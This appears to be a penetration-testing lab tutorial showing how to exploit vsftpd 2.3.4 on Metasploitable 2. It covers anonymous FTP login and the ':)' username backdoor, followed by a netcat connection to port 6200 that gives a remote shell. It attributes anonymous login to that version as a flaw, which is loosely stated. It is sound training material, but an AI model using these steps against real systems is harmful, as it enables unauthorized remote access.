FTP Anonymous Login Issue:

Many of the network services can be attacked if they are not updated continuously. There are many well-known issues like FTP Anonymous Login issue that can be exploited. In FTP version vsftpd 2.3.4, there is a flaw. This version is vulnerable to anonymous login. That means anyone can login to FTP using login Username as anonymous and password can be anything or can be left as blank.

Deliverable:

Lab Set up

• Virtualization using Oracle Virtual box

• Attacker’s System: Kali Linux

• Target System : Metasploitable 2

In Kali Linux --> Terminal

1. Connect to the FTP of target.

~# ftp [IP address of target] (Enter)

2. Input Name as 'anonymous' and Password as anything or just keep it blank.

> NAME--> anonymous (Enter)

> PASSWORD--> anything or keep it blank (Enter)

3. Thus you will get the FTP shell of the target. Now you can run any FTP commands in Guest privilege.

Smiley Face Attack:

The same version of FTP i.e. vsftpd 2.3.4 is vulnerable to another attack. Here while inputing the Name and Password, just put a smiley face i.e. :) at the end of name and password can be given as anything. The connection hangs up after password. and you can actually get the shell of the target using tool Netcat.

Deliverable:

Lab Set up

• Virtualization using Oracle Virtual box

• Attacker’s System: Kali Linux

• Target System : Metasploitable 2

In Kali Linux --> Terminal

1. Connect to the FTP of target.

~# ftp [IP address of target] (Enter)

2. Input Name as 'anonymous' and Password as anything or just keep it blank.

> NAME--> Parag:) (Enter)

> PASSWORD--> anything (Enter)

3. It will hang after password.

4. Now in other terminal of Kali Linux, use Netcat to connect to the target.

~# nc [IP address of target] 6200 (Enter)

Here, nc --> Netcat

6200 --> Port Number

5. Thus you will get the shell of the target. Now you can run any commands in target system from Kali Linux.